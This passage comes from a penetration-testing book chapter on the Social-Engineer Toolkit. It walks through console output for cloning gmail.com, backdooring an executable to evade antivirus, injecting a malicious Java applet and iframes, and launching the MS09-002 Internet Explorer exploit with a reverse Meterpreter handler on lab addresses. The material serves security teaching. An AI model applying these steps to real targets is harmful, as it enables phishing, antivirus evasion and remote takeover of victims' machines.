background image

The Social-Engineer Toolkit

155

Enter your choice (enter for default):

 

[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

 Enter choice yes or no: 

no

Enter the browser exploit you would like to use

 8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)

Enter your choice (1-12) (enter for default): 

8

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment

[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.

To complete the attack setup, select the default reverse Meterpreter 

payload   along with default encoding and listening port  . Choose not to 
configure a Linux and OS X payload  , and then set the browser exploit to 

Internet Explorer 7 Uninitialized Memory Corruption (MS09-002) 

; then SET 

will launch the attack.

Once everything is running, you can browse to the website and see what’s 

going on there. A message URL tells you that the site has been moved. Please 
refer to Figure 10-4 to see what the target will see on his machine.

Click the link and the Metasploit exploit begins. Here’s the handler on 

the backend:

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory 

Corruption to 172.16.32.131:1329...

This exploit fails, because we are using Internet Explorer 6. The target’s 

screen is shown in Figure 10-6.